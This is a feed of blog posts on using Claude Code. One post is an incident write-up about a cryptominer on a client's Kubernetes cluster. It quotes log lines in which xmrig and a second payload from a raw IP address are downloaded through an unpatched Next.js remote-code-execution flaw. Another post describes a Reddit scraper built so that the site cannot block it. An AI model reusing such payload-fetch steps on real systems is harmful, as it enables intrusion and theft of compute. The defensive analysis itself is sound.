Lakshmi Narasimhan — Thu, 08 Jan 2026 00:00:00 +0000

I used to collect SaaS boilerplates like some people collect vintage wine.

ShipFast. LaunchFast. ShipQuick. QuickShip. FastLaunch. LaunchQuick. (I may be making some of these up. I genuinely can’t tell anymore.)

Each one promised the same thing: “Save 40 hours of setup! Auth, payments, email — all pre-configured!”

And they delivered. Sort of. You got a codebase with 47 features, of which you needed 3. You spent 20 hours understanding their architectural decisions. Then another 20 hours ripping out the features you didn’t need. Then another 10 hours wondering why they chosethat ORM.

Revolutionary time savings.

What Boilerplates Actually Sold You

Let’s be honest about what you were paying for:

Code you didn’t want to write — Auth flows, Stripe webhooks, email templates
Decisions you didn’t want to make — Folder structure, state management, API patterns
Security patterns you didn’t know — CSRF tokens, rate limiting, input sanitization

The first two? Claude Code handles those in minutes now.

The third one? That’s where it gets interesting.

The Security Argument (And Why It’s Half Right)

I’ve seen this take on Reddit: “AI is careless with security and exposes secret keys.”

Fair. I’ve watched Claude Code cheerfully commit.env files to git(not now, in its early days). I’ve seen it generate SQL queries that would make Bobby Tables proud.

But here’s the thing: I’ve also seenpaid boilerplates ship with hardcoded API keys in example files. I’ve seen “battle-tested” starter kits with XSS vulnerabilities that a first-year CS student would catch.

The boilerplate isn’t magic. It’s just someone else’s code. Sometimes that someone else knew what they were doing. Sometimes they were just faster at shipping than you.

What Claude Code Actually Changes

Ask Claude Code to set up Stripe webhooks.

Watch it scaffold the endpoint, handle signature verification, implement idempotency, and add proper error handling. In about 3 minutes.

Then ask it why it made each decision.

That’s the part boilerplate sellers don’t want you to think about. The boilerplate gives you code. Claude Code gives you codeand explains the reasoning. You walk away actually understanding webhook signature verification instead of just copy-pasting it.

The Real Question

Do you know what to ask for?

If you understand auth flows, webhook handling, rate limiting, and input sanitization — Claude Code replaces the boilerplate entirely. You’re paying $299 for code you can now generate in a conversation.

If you don’t know what you don’t know — the boilerplate is documentation-as-code. It shows you “here’s how someone who’s shipped 50 SaaS apps structures their webhook handlers.”

But here’s the thing: Claude Codealso knows how someone who’s shipped 50 SaaS apps structures their webhook handlers. You just have to ask.

The Uncomfortable Middle Ground

Some boilerplates still earn their keep:

Active communities that find and patch subtle bugs
Security audits by actual security people (rare, but they exist)
Opinionated architecture from someone who’s felt the pain of bad decisions

But most boilerplates? They’re charging you for the labor of stitching together open-source packages. That labor is now approximately free.

The Pragmatic Take

Use Claude Code to build your first few projects from scratch.

You’ll learn the patterns. You’ll understandwhy you need idempotency keys on webhook handlers. You’ll feel the pain of forgetting CSRF protection and then never forget it again.

Then you’ll realize you never needed the $299 boilerplate.

You needed the knowledge it contained.

That knowledge is now a conversation away.

The $299 boilerplate sold you fish. Claude Code teaches you to fish while also catching the fish for you. Your mileage may vary, batteries not included, void where prohibited.

]]>

The Invisible Tax You Pay When You Vibe Code

Lakshmi Narasimhan — Wed, 07 Jan 2026 00:00:00 +0000

You shipped the feature. Tests pass. PR merged.

Two weeks later, something breaks and you open that file. You stare at the code.Your code. Code you wrote. Code that works.

You have no idea what it does.

Welcome to comprehension debt.

The Debt Nobody Talks About

Technical debt is code you know is bad. Comprehension debt is code you don’t understand well enough to know if it’s bad.

There’s a crucial distinction here that a Reddit commenter nailed: “We’re getting correct code, but notright code.” The code runs. It passes tests. But ask someone why it makes specific design choices, why certain patterns were used, why the architecture looks the way it does — and the answer is often “Copilot put it there.”

With AI coding assistants, we can now generate working code faster than we can understand it. Claude writes 200 lines. Tests pass. Ship it. Next feature.

Repeat this fifty times and you’ve got a codebase that works but might as well be written by a stranger. Because functionally, it was.

Legacy Code on Arrival

Here’s the uncomfortable truth that r/programming figured out: vibe coding is legacy code from day one.

One commenter called it “the payday loan of technical debt.” You’re borrowing velocity from your future self at predatory interest rates.

A freelance developer with 8 years of experience recently described a pattern he’s seeing repeatedly: companies paying good money for internal software that barely works. Tons of errors, unreasonably slow, security flaws everywhere. When he looks at the codebase, the same telltale signs: AI-generated comments, algorithms that make no sense, inconsistent patterns. Yes, it mostly works. But it works terribly.

In one case, a designer with CSS knowledge but not much more created a full React app with AI. When they hired a freelancer to fix it up, he deleted 90 files out of 100.

That’s not technical debt. That’s a technical foreclosure.

Where It Hurts

Comprehension debt doesn’t show up on sprint boards. It shows up when:

Debugging takes 10x longer because you’re reverse-engineering your own code. Yourown code. Like some kind of archaeologist excavating your past self’s decisions.
Small changes require big rewrites because you can’t safely modify what you don’t understand.
You can’t explain the system to anyone, including future you. Especially future you.
Architecture decisions compound badly because each layer is built on foggy assumptions and vibes.

Everyone talks about vibe coding. Nobody talks about vibe debugging. There’s a reason for that.

The irony: you used AI to go faster, but now you’re slower because you have to re-learn your own codebase every time you touch it.

The Skill Atrophy Problem

Here’s what worries senior developers: the heavier you lean on AI, the more your own skills degrade.

Someone described AI coding assistants as “a hyper-intelligent, infinitely patient junior developer.” Another added: “overconfident and unable to learn.”

That’s the trap. A junior developer eventually becomes a senior developer. They remember painful mistakes. Their understanding of your system grows over time.

AI doesn’t. Every conversation starts fresh. It will confidently suggest the same antipattern tomorrow that you rejected today. And if you’ve stopped exercising your own judgment because the AI handles it, you won’t catch it.

Ironically, the only people who should be leaning heavily on AI for code generation are people who are already experts. They can spot when it’s wrong. Everyone else is just accumulating comprehension debt they can’t even see.

Fighting Back

You don’t have to understand everything. That’s the whole point of abstraction. But you need to understandenough.

1. The Five-Minute Rule

After AI generates code, spend five minutes actually reading it. Not skimming. Reading. Like with your eyeballs.

If you can’t explain what it does to a rubber duck, you’ve got comprehension debt.

2. Write the Comments Yourself

Don’t let AI write comments. Write them yourself, in your own words. If you can’t write the comment, you don’t understand the code.

One veteran developer pointed out: “Given that very few people comment the code, if there are comments at all it’s AI generated.” Comments have become a smell for AI slop, not a sign of good documentation.

3. Draw the Damn Diagram

For any non-trivial flow, sketch the data path. Boxes and arrows. Takes two minutes. Forces you to understand the actual architecture, not the architecture you assume exists.

4. Refactor Before You Forget

The best time to refactor AI-generated code is immediately after it works. You’ve got context. You’ve got momentum. Wait two weeks and that context is gone forever.

Future you will not remember. Future you has problems of their own.

5. Your PR, Your Responsibility

“Copilot put it there” is not an acceptable answer in a code review. It’s the same as saying “I don’t know, it was the first autocomplete option.”

The AI is a tool, like your IDE. At the end of the day, you’re responsible for every line in your PR. If you can’t defend the code, you shouldn’t be shipping the code.

The Uncomfortable Truth

I’m not saying go back to writing everything by hand. That ship has sailed.

AI leverage is real. Use it.

But leverage without understanding is just deferred confusion. Every line of code you don’t understand is a question you’ll have to answer later, usually at 2am, usually when something is on fire.

Those championing AI focus on the speed something new can be developed. But in the long term, the real difficulty is how easily it can be maintained. And you can’t maintain what you don’t understand.

The developers who’ll thrive aren’t the ones who generate the most code. They’re the ones who maintain a sustainable ratio between code shipped and code understood.

Velocity without comprehension isn’t velocity.

It’s procrastination with extra steps.

]]>

I Found a Business Idea and Shipped It in One Claude Code Session

Lakshmi Narasimhan — Tue, 06 Jan 2026 00:00:00 +0000

I shipped a new product landing page yesterday. Not “finished the design.” Not “pushed to staging.” Live. Accepting waitlist signups. DNS propagated. The whole thing.

Time from “huh, interesting Reddit post” to “supabyoi.com is live”: under an hour.

This is either impressive or terrifying, depending on how you feel about the pace of software development in 2026.

The Setup

I’ve been building a Reddit research tool that lives inside Claude Code. It monitors subreddits, scores posts against your interests, and helps you find signals in the noise. The tool uses Reddit’s public JSON endpoints—no API keys required, because Reddit doesn’t issue them anymore.

That’s not hyperbole. Reddit recently announced they’re “ending self-service API access.” You can’t just create an app and get keys anymore. You have to submit a request form, explain your use case, and wait for approval. The approval that, according to r/redditdev, never comes. “Tickets rejected, modmail ignored, admin DM ignored.” One developer summed it up: “I don’t believe anyone is getting API access for small personal use at this point.”

They’re pushing everyone to Devvit, their walled-garden platform. JavaScript only. Runs on their servers. Limited to what they allow.

If you want Reddit data for your own tools, you either pay enterprise rates, beg for approval, or use public endpoints like a normal browser would. I chose option three.

GummySearch learned this the hard way. They built a Reddit research tool, hit $11k/month MRR, served 135,000 users. Then Reddit wouldn’t give them a commercial license. They’reshutting down by December 2026. The founder didn’t want to operate “looking over your shoulder every day.”

Public endpoints don’t have that problem. Same data. No license to revoke.

I had the tool pointed at r/Supabase, watching for pain points. Standard demand validation stuff.

It surfaced a pattern across multiple threads.“I’m a mass-project starter. Supabase ain’t for me?” (41 upvotes, 27 comments).“Is Self-Hosting Supabase Worth It?” (73 upvotes, 60 comments).

The pain: Supabase’s free tier caps you at 2 projects. Pro tier is $25/month plus $10 per additional project. If you’re an indie dev shipping lots of small bets, you burn through that limit fast.

Supabase is genuinely great for rapid prototyping—I use it myself. The pricing just doesn’t fit the small bets workflow.

The comments were gold:

“It feels like a bait-and-switch where the upgrade appears to remove project limits, only to hit you with unexpected per-project fees”
“Setting it up properly takes time, maintaining it takes time, keeping the server secure takes time”

“The setup process is extensive, unclear and often frustrating”
“Very strange pricing model, which is kind of unacceptable”

Translation: Indie devs love Supabase for building fast. They hate the pricing when they ship a lot. They want to self-host but are terrified of maintaining it.

The Evaluation

I have a framework for this. Open source project + operational complexity + permissive license = potential hosting business. I’ve been running variations of this for a while.

I asked Claude—right there in the same session—to run the threads through the framework:

Pain point: Real. Multi-project pricing punishes prolific shippers.
License: Apache 2.0. Clear.
Operational complexity: High. Supabase runs ~12 services.
Existing managed option: Yes, but that’s the pain source—not the solution.

Then the key insight: I’m not competing with Supabase Cloud on hosting. I’m offering care and feeding for self-hosted instances. Different model entirely.

They bring their own VPS (Hetzner, $10-15/month)
I handle upgrades, backups, security
Fixed monthly fee: $25. Unlimited instances.

One customer with 5 projects: $25 from me + $15 VPS = $40 total vs $75 on Supabase Cloud.

The Build

Here’s where it gets fast.

I told Claude:

“Create a landing page. Tailwind, not CDN. Minimal. Dev-focused. Static HTML.”

Claude scaffolded the project structure, wrote the copy, set up the build pipeline. I tweaked the value prop and added my ConvertKit form.

Then:

“Push to GitHub, I’ll deploy to Cloudflare Pages.”

Done.

Total time building the landing page: maybe 20 minutes. Most of that was me fiddling with colors.

The Stack

For the curious:

Landing page: Static HTML, Tailwind CSS, Cloudflare Pages
Waitlist: ConvertKit embed
Domain: Namecheap (purchase) → Cloudflare (DNS)
Total cost so far: $12 for the domain

The actual product will be FastAPI + Supabase (yes, the irony) + HTMX. SSH into customer VMs. Cron jobs for backups. Simple. I can ship a working beta this week.

The Point

This isn’t about Supabyoi specifically. It’s about the workflow.

Old way:

Have idea
Think about it for weeks
Research competitors
Write PRD
Design mockups
Build MVP
Realize nobody wants it
Total time: 3 months

New way:

Tool surfaces interesting signal
Ask Claude to validate against framework
Ask Claude to build landing page
Ship
See if anyone signs up
Total time: 1 hour

The landing page is a hypothesis test. Not a commitment. If I get 50 waitlist signups, I build the thing. If I get 5, I move on. The cost of being wrong is $12 and an hour of my time.

About That Reddit Tool

I’ve been quietly building this for months. It’s how I found the signal that led to this post.

The key: it lives inside Claude Code. Not a separate app. Not a browser tab. Right there in my terminal, in the same session where I’m writing code and shipping products.

The architecture: Crawler runs locally or on your VPS (Reddit can’t shut you down if they can’t block your IP). Data syncs to a backend. You query it with natural language through Claude. “What are people complaining about in r/Supabase?” → ranked list of pain points with source threads. Then in the same breath: “Evaluate this against my validation framework.” Then: “Build me a landing page.”

One session. Research to shipping.

No Reddit API keys because Reddit killed self-service access. Uses public endpoints. Same data you’d see browsing the site. Your IP, your rate limits, no approval form that never gets answered.

I’m not ready to launch it yet, but if you want early access, DM me onLinkedIn orTwitter/X.

The Takeaway

The leverage is real. One person, one AI assistant, one hour, one live product.

The bottleneck isn’t building anymore. It’s finding the right thing to build. That’s why the Reddit tool matters more than the Supabase thing. The tool finds signals. Claude validates them. Claude builds the test. You watch the data.

Small bets at scale.

supabyoi.com is live. Let’s see what happens.

]]>

Your MCP Servers Are Eating Your Context

Lakshmi Narasimhan — Mon, 05 Jan 2026 00:00:00 +0000

I love MCP. Model Context Protocol is genuinely one of the best things to happen to Claude Code.

I also hate MCP.

Because every MCP server I add is another pile of tool definitions crammed into my context window. Supabase. Betterstack. Sentry. Playwright. Each one brings 5-15 tools. That’s 40+ tool definitions sitting there, burning tokens, even when I’m just asking Claude to fix a typo.

The technical term for this is “token bloat.” The accurate term is “I’m paying for tools I’m not using.”

The Obvious Solution (That Doesn’t Work)

“Just load MCPs on demand!”

Revolutionary concept. Except Claude Code doesn’t support hot-reloading MCP servers. You pick your MCPs at session start, and that’s your life now. Want to add Sentry mid-session? Restart. Lose your context. Start over.

Nobody should have to live like that.

The Agent Escape Hatch

Here’s where it gets interesting.

Claude Code has agents. Agents can spawn with specific tools. So naturally, I thought: what if I keep my main session lean, and spawn agents when I need MCP access?

Main session stays clean. Agent does the Supabase query. Returns results. Everybody’s happy.

Except.

The Inheritance Problem

Agents inherit MCP tools from their parent session.

Read that again.

If I want my debug agent to call Supabase, Supabase MCP must be loaded in my main session. The agent canrestrict which tools it uses, but it can’t access tools the parent doesn’t have.

So I’m back to loading everything upfront. The bloat remains. The horror.

Poor Man’s MCP

Fine. If agents can’t get MCP tools independently, maybe they don’t need MCP at all.

Agents have Bash. Bash has curl. These services have REST APIs.

What if I wrote thin wrapper scripts?

debug-api sentry-issue PROJ-123
debug-api supabase-query users "id=eq.abc123"
debug-api betterstack-logs "error" --from "2024-01-15"

Each wrapper hits the API directly, returns JSON. Agent calls wrappers, correlates results, returns findings. Main session stays lean.

I even started designing a mini-spec. Self-describing tools via--tools. Consistent JSON envelope. Exit codes for quick status checks.

MCP-lite. Poor man’s MCP. Whatever you want to call it.

It would work. But I’d be rebuilding what MCP already does, just… worse.

Wait. Why Can’t Agents Just Call MCP Directly?

This is where my brain finally caught up.

MCP servers are just processes. They communicate via JSON-RPC over stdio. Claude Code starts them, maintains connections, sends calls.

An agent with Bash could do the same thing.

Start server. Send JSON-RPC. Parse response. Kill server.

No inheritance needed. The agent IS the MCP client.

The Tool That Already Exists

Before I started writing my own MCP client in bash (a decision I would have regretted), I searched.

mcptools exists.

brew install f/tap/mcp
# List available tools
mcp tools @supabase/mcp-server
# Call a tool directly
mcp call @supabase/mcp-server query '{"sql": "SELECT * FROM users"}'

Start server. Make call. Get result. Server shuts down.

This is the missing piece.

The Pattern I’m Testing

Main Session (ZERO MCP tools loaded)
|
└── spawn debug-backend agent
|
├── mcp call @supabase/mcp-server query '{...}'
├── mcp call @sentry/mcp-server get-issue '{...}'
└── mcp call @betterstack/mcp-server search '{...}'
|
Returns structured findings

Main session keeps full conversation context. Agent spawns with just Bash. Agent discovers and calls MCP tools on-demand. Zero token bloat.

For frontend debugging, same pattern with Playwright:

mcp call @playwright/mcp-server navigate '{"url": "..."}'
mcp call @playwright/mcp-server screenshot '{}'

What I’m Still Figuring Out

I haven’t battle-tested this yet. Open questions:

Auth handling: Do all MCP servers pick up env vars correctly when spawned fresh?
Cold start latency: Is spawning a server per-call too slow for rapid iteration?
Error recovery: What happens when the MCP server crashes mid-call?
Which servers play nice: Some MCP servers might not like the start-stop lifecycle.

If you try this pattern, let me know what breaks.

The Punchline

I spent hours designing “MCP-lite” before realizing I could just… call MCP directly from agents.

Learn from my suffering.

The tools exist. The pattern is sound. The token bloat is optional.

Now I just need to actually use this for a month and see what explodes.

]]>

I Found a Cryptominer in My Client's Production Cluster. Claude Code Found the Attacker.

Lakshmi Narasimhan — Sat, 03 Jan 2026 00:00:00 +0000

New Year’s Day. Coffee in hand. Ready to ease back into work.

Then I saw the logs.

2026-01-02T06:34:27 GET xmrig-6.24.0-linux-static-x64.tar.gz
2026-01-02T06:34:30 GET http://37.32.6.33:7979/m
2026-01-02T06:34:30 spawn /opt/systemf/m ENOENT

xmrig. In production. Someone was mining Monero on my client’s Kubernetes cluster.

The horror.

The Investigation

I had a few hundred megabytes of JSON logs and approximately zero patience for manually correlating timestamps. So I did what any reasonable person would do: I asked Claude Code to analyze the logs and figure out what triggered the miner download.

Within seconds, it built a timeline:

Time Event

06:34:26. Normal request to /onboarding

06:34:27. xmrig downloaded from GitHub

06:34:30. Secondary payload from sketchy IP

06:34:57. Container OOMKilled

The cryptominer was so resource-hungry it consumed 2GB of memory in 30 seconds and crashed the container. Ironic. The attacker’s greed saved us from a prolonged compromise.

But how did they get in?

Chasing Red Herrings

Claude Code’s first suspect: a low-version npm package calleddevice-unique-keygen. Added by a developer whose email matched the package maintainer. Classic supply chain attack pattern.

I got excited. Maybe too excited.

Claude Code fetched the GitHub repo, analyzed the source code, checked for postinstall scripts, looked for obfuscated code, searched for eval() calls.

Nothing. The package was clean. Just a browser fingerprinting library. Boring. Legitimate.

We moved on.

No malicious init containers. No sidecars. No .ashrc shenanigans. The Dockerfile was clean. The pod spec was clean.

Everything was clean except someone was definitely mining crypto on our infrastructure.

The Actual Answer

Claude Code rannpm audit on the codebase.

critical │ Next.js is vulnerable to RCE in React flight protocol
Package │ next
Patched │ >=15.3.6
Your ver │ 15.3.4
CVSS │ 10.0

CVSS 10. The maximum possible score. The “your house is actively on fire” of security ratings.

The app was running Next.js 15.3.4. A publicly disclosed RCE vulnerability. No authentication required. An attacker could run arbitrary commands on the server by sending a crafted request.

That’s exactly what happened. They sent a request, ran wget twice, downloaded the miner, and started extracting crypto value from compute cycles they weren’t paying for.

The container’s memory limit stopped them. A $20/month Kubernetes resource limit prevented what could have been ongoing theft.

What Claude Code Actually Did

I want to be clear about what happened here. I didn’t single-handedly unravel a sophisticated attack. I didn’t manually correlate log timestamps or reverse-engineer obfuscated npm packages.

I said “check these logs” and Claude Code:

The entire investigation took under an hour. Not because I’m fast. Because Claude Code is.

The Fix

pnpm update next@^15.3.6

One command. That’s the remediation for a CVSS 10.0 vulnerability.

We also orphaned the compromised pods for forensic analysis, rotated secrets, and added proper security contexts to prevent future wget adventures.

The Lesson

Two things saved us:

One thing would have prevented this entirely: runningnpm audit before deployment.

The attacker exploited a vulnerability that was publicly disclosed and patched. We just hadn’t updated yet.

Godspeed with your own dependency updates.

My Medium friends can read this over there as well.

]]>

Claude Code Hooks: The Feature You're Ignoring While Babysitting Your AI

Lakshmi Narasimhan — Fri, 02 Jan 2026 00:00:00 +0000

You’re doing it again.

Claude just edited a file. You’re about to type “now run prettier.” For the fourteenth time today. Like some kind of digital hall monitor.

Meanwhile, there’s a feature sitting right there in Claude Code that would do this automatically. It’s called hooks. And based on my extremely scientific survey of Reddit threads, approximately nobody is using them.

What Hooks Actually Are

When Claude Code runs, it fires events. Before it uses a tool. After it uses a tool. When it stops. When it sends a notification.

Hooks let you intercept these events and run shell commands automatically.

That’s it. That’s the whole concept.

Claude edits a file? Run your formatter. Claude finishes a task? Send yourself a Slack message. Claude tries to commit? Run your linter first.

No more babysitting. No more “please remember to run prettier.” You set it once and forget it exists.

The Three Hooks That Actually Matter

I spent way too long reading Reddit threads about hooks. Here’s what power users actually care about:

1. The Formatter Hook

This is the most common one. Claude edits your code, your formatter runs automatically.

{
"hooks": {
"PostToolUse": [
{
"matcher": "Write|Edit|MultiEdit",
"hooks": [
{
"type": "command",
"command": "prettier --write $CLAUDE_FILE_PATH"
}
]
}
]
}
}

No more “can you run prettier on that?” Revolutionary concept, I know.

2. The Notification Hook

You kicked off a task. You walked away to make coffee. Now you’re checking your terminal every 30 seconds like a nervous parent.

{
"hooks": {
"Stop": [
{
"matcher": "",
"hooks": [
{
"type": "command",
"command": "curl -d 'Claude is done' ntfy.sh/your-topic"
}
]
}
]
}
}

Send it to Slack. Send it to Discord. One person made their Mac speak out loud. Another person made Claude meow. (Allergies. I don’t judge.)

3. The “Please Remember Your Instructions” Hook

This one solves a specific pain that will sound familiar: Claude compacts its context to save tokens. In doing so, it sometimes… forgets things. Important things. Things you put in yourCLAUDE.md.

The fix? Re-inject your core rules on every prompt:

{
"hooks": {
"PreToolUse": [
{
"matcher": "UserPromptSubmit",
"hooks": [
{
"type": "command",
"command": "cat .claude/rules.txt"
}
]
}
]
}
}

Your rules show up in the context window. Every time. Claude can’t “forget” what’s staring it in the face.

Where This Goes

Put your hooks in.claude/settings.json in your project, or~/.claude/settings.json globally.

Project-level hooks are better. Different projects have different formatters, different rules, different needs. Keep it scoped.

The One Gotcha

Someone on Reddit pointed out a real issue: if your formatter changes files, Claude gets a system reminder about those changes. Every. Single. Time.

If you’re formatting aggressively, that’s a lot of noise in your context window. Tokens that could be doing useful work are now just telling Claude that yes, you added a semicolon.

The fix is to be selective. Format on commit, not on every edit. Or accept the tradeoff. Your call.

Why You Should Care

Hooks turn Claude Code from “AI assistant you have to supervise” into “AI assistant that follows your rules automatically.”

The power users on Reddit are calling this a game-changer. The rest of the users are still typing “please run the linter” by hand.

Don’t be the second group.

Set up three hooks. Formatter, notifications, rule enforcement. Takes ten minutes. Saves hours of typing the same commands.

Your future self will thank you.

What’s the most repetitive thing you’re still typing manually in Claude Code?

]]>

Stop Making Claude Code Guess

Lakshmi Narasimhan — Tue, 30 Dec 2025 00:00:00 +0000

This is post 4 of 4 in my Claude Code series. Catch up onThe Mental Model,Skills vs Slash Commands, andThe Control Freak’s Guide to Agents if you missed them.

We’ve covered how to trigger Claude (slash commands), teach it (skills), and let it explore (agents). Now: how to give it access to the real world.

Because right now, Claude is trapped in a box. It can read your code. It can write your code. But it can’t see what’s on a webpage. It can’t query your database. It can’t check your production logs. It’s a very intelligent entity with no access to external reality.

Ask Claude what your database schema looks like without an MCP server, and you get this:

“Based on typical Postgres schemas, your users table probably has an id, email, and created_at column…”

Probably. Or we could justquery the actual database. Revolutionary concept, I know.

MCP servers are the escape hatch. They give Claude eyes, ears, and hands outside your codebase.

What MCP servers actually are

MCP (Model Context Protocol) servers expose tools to Claude over a standardized protocol. Each server runs as a separate process and registers its capabilities — functions Claude can call when it needs to interact with something external.

Examples:

Playwright: browse the web, scrape pages, automate testing
Supabase/Postgres: query databases directly
Betterstack: pull production logs
Filesystem: access files outside your project

The “server” terminology is slightly misleading — they’re really tool providers that Claude can invoke. You configure them in.mcp.json, Claude discovers their capabilities, and suddenly it can do things it couldn’t do before.

The critical distinction: capabilities vs instructions

This is where people get confused between MCP servers and skills. Let me make it painfully clear:

MCP servers = capabilities. They let Claude DO something it couldn’t do before. Playwright gives Claude the ability to browse. A Postgres MCP gives Claude the ability to query databases.

Skills = instructions. They tell Claude HOW to do something. A “web-scraping” skill might teach Claude efficient patterns for using Playwright.

You often want both. The MCP server provides the capability. The skill provides the expertise.

Example: I have the Supabase MCP installed (capability). I also have a skill that says “when querying user data, always filter by organization_id first for performance” (instruction). The skill makes the capability more useful, but without the capability, the skill is just a nice idea with no way to execute.

Skills can tell Claude what to do. They can’t give Claude new abilities. Good luck querying your production database using only skills.

The token cost nobody mentions in the marketing materials

Here’s the thing that caught me off guard:MCP server tool definitions are always in your context window.

Every MCP server you install adds its tool signatures to every conversation. Even when you’re not using it. Even when you’re doing something completely unrelated. The tool definitions are just sitting there, eating tokens.

Install 10 MCP servers because they seemed cool? All 10 are eating tokens in every session. Like subscription services you forgot you signed up for, except it’s your API bill.

This matters for:

Context window limits (you have less room for actual work)
Cost (more tokens = more money, math is cruel)
Performance (sometimes, more context = slower responses)

Be intentional. Don’t install MCP servers “just in case.” Install what you actually use. Uninstall what you don’t. Your token budget will thank you.

The patterns that waste everyone’s time

Watch any Claude Code session where someone doesn’t have the right MCP servers installed:

Asking Claude to guess what a webpage looks like (when Playwright could just open it)
Copy-pasting API responses into the chat (human middleware)
Describing database schemas in words (when Claude could just query them)

MCP servers aren’t optional extras. They’re not power-user features for people who want to show off. They’re how Claude becomes actually useful for real-world tasks instead of just being a very eloquent guesser.

If you’re regularly copy-pasting external data into Claude, you need an MCP server. Stop being the bottleneck.

My current MCP stack (minimal, intentional)

For my SaaS projects, I typically configure:

Playwright: browser automation, web scraping, testing flows
Supabase (read-only): querying my production database without leaving Claude
Betterstack: pulling logs when debugging production issues

Key point: these areproject-specific, configured in.mcp.json in the repo. Not global. When I’m working on this blog, I don’t need Supabase or Betterstack — so they’re not loaded, and I’m not paying the token cost.

This is the lever most people miss. You can have different MCP stacks for different projects. A SaaS project needs database and logs. A content project might just need Playwright for research. Configure per-project, pay only for what that project actually needs.

I’ve tried others and removed them. The token cost wasn’t worth it for occasional use. That fancy Notion MCP? Gone. The GitHub MCP for repo scaffolding? Turns outgh CLI works fine and doesn’t eat context.

Minimal viable MCP stack. Everything you need, nothing you don’t.

When to add an MCP server (and when not to)

Add an MCP server when:

You’re regularly copy-pasting external data into Claude
You’re asking Claude to guess at things it could just look up
The task requires interacting with systems outside your codebase
The capability would be used frequently enough to justify the token cost

Don’t add an MCP server when:

You might use it “someday” (you won’t, and it’ll eat tokens until you remember to remove it)
You’re just curious what it does (read the docs instead)
Another tool already covers the capability
A CLI tool would be faster and cheaper (often true)

The full picture: MCP servers + skills + agents

Here’s how they compose in practice. Say I’m debugging why users are seeing 500 errors:

Betterstack MCP pulls the error logs from the last hour
Supabase MCP queries the affected user records
Agent correlates the data — finds that all failing requests share a malformed organization_id
Skill reminds Claude to check the migration history when schema issues appear
Slash command triggered this whole investigation with/debug-500s

Each layer does its job. The MCP servers are the foundation — without the capability to actually access logs and data, everything else is just documentation for things you can’t do.

The pattern: MCP servers give Claude access to production reality. Skills teach Claude how to navigate that reality efficiently. Agents do the investigation autonomously. You get answers instead of guesses.

(There’s a deeper rabbit hole here about balancing MCP capabilities against context window costs — which MCPs to load when, how to structure project-specific configs, when to use CLI tools instead. That’s a future post.)

This completes the 4-part series:

The Mental Model (slash commands, skills, agents, MCP servers, plugins)
Skills vs Slash Commands (one works, one “works”)
Agents (stop scripting exploration)
MCP servers (stop making Claude guess)

I help technical founders develop, deploy, and market their SaaS using Claude Code. If this series saved you some confusion, that’s what I’m here for.

I’m curious:

What’s your MCP stack? Which servers do you actually use daily vs installed “just in case”?
Have you noticed the token cost creep from too many MCPs?
Any MCP servers you’d recommend that I haven’t mentioned?

Reply or comment — I read everything.

]]>

How to Let Claude Code Explore Without Losing Control

Lakshmi Narasimhan — Mon, 29 Dec 2025 00:00:00 +0000

This is post 3 of 4 in my Claude Code series. Catch up onThe Mental Model andSkills vs Slash Commands if you missed them.

My first instinct with Claude Code was to script everything. Every task got a slash command. Every command tried to handle every edge case. Fifty lines of instructions. Nested conditionals. Error handling for scenarios that would never happen. It was beautiful. It was comprehensive. It was also completely fragile and broke constantly.

I was basically writing enterprise Java in prompt form. Nobody should have to live like that.

Then I discovered agents. Now my slash commands are thin — they set up context and spawn an agent to do the actual work. The agent figures out the details. My blood pressure dropped significantly.

(Quick terminology note: Claude Code calls these “subagents” because they run as subprocesses of your main session. Everyone just says “agents.” I’ll use “agent” throughout because life is short.)

The mistake: treating Claude like a very slow bash script

I had a/research-topic command that tried to:

Search the codebase for relevant files
Read documentation
Check external sources
Synthesize findings
Format the output in exactly the right way
Handle seventeen different edge cases I imagined at 2 AM

It was a mess. Too many conditionals. Too many assumptions about what files exist and where. It broke every time the codebase changed, which was constantly, because that’s what codebases do.

The fundamental problem: I was trying to script exploration. But exploration is inherently unpredictable. You don’t know what you’ll find until you look. That’s literally the definition of exploration. Trying to pre-script it is like writing detailed driving directions before knowing where you’re going.

“Turn left at the third building. Unless there isn’t a third building. Then turn right. Unless you’re already facing north. Check the position of the sun…”

This is madness. Don’t do this to yourself.

What agents actually do (and why it’s better)

Agents have their own context. They’re decoupled from your main conversation. They go off, do their thing, and come back with answers.

You describe the goal. The agent figures out the path.

“How does authentication work in this codebase?” I have no idea which files to look at. I could spend ten minutes finding them myself. Or I could let Claude spawn an Explore agent — one that’salready built into Claude Code — and get an answer in two minutes.

Here’s what that actually looks like:

Me: "How does authentication work in this codebase?"
Claude spawns Explore agent → searches → reads 8 files → returns:
"Authentication uses JWT tokens stored in httpOnly cookies.
The flow: login request → /api/auth/login → validates credentials
→ creates token → sets cookie. Token validation happens in
middleware at src/middleware/auth.ts:42. Refresh logic is in
src/lib/auth/refresh.ts."

The agent checked 8 files. Maybe it checked 15. I don’t know, and I don’t care. I care about the answer.

This is fundamentally different from scripting. You’re not specifying steps. You’re specifying outcomes. It’s like hiring a contractor versus writing assembly instructions. One of these is dramatically less exhausting.

What’s inside an agent (dissecting Explore)

Claude Code ships with a built-in Explore agent. Let’s look under the hood:

AspectWhat Explore UsesModelHaiku (fast, cheap)ToolsGlob, Grep, Read, limited Bash (ls, git log, etc.)Can modify files?No — strictly read-onlyContextIsolated from your main conversation

The Explore agent has three thoroughness levels:

Quick — targeted lookup, minimal file traversal. Use when you know roughly what you’re looking for.
Medium — searches multiple related locations. The default for most queries.
Very thorough — comprehensive search across unusual places and naming conventions. Slower, but finds things hidden in unexpected corners.

Here’s the part nobody emphasizes enough:the agent runs in its own context window. It can read 20 files, search through thousands of lines, and when it’s done, you get a summary. Your main conversation stays clean. Your token budget stays intact.

This is huge. Before I understood this, I was reading files directly in my main session and watching my context fill up with code I’d already reviewed. Now the agent does the heavy reading. I get the conclusions.

When to use agents (a guide for control freaks learning to let go)

Use agents when the task requires exploration:

“Find all API endpoints and document them”
“Investigate why this test is flaky”
“Research how other projects handle rate limiting”
“What files would I need to change to add feature X?”

Use agents when you’d be guessing at the steps:

If you find yourself writing a slash command with lots of “if this exists, then…” logic, stop. Step away from the keyboard. That’s agent territory. You’re trying to pre-solve a problem you don’t understand yet.

Use agents for heavy reading:

Agents have their own context window. They can read 20 files without bloating your main session. When they’re done, they return a summary. Your conversation stays clean.

Creating your own agents

You don’t have to use the built-in agents. You can create your own.

An agent is just a skill (markdown file in.claude/commands/) that spawns a subagent using the Task tool. Here’s a simple one:

# /research-topic
Research this topic in the codebase: $ARGUMENTS
Use the Task tool with subagent_type="Explore" to:
- Search for relevant files and patterns
- Read key implementation files
- Understand how it currently works
Return a structured summary:
- Key files involved (with line numbers)
- How the feature currently works
- Any gaps, issues, or technical debt found

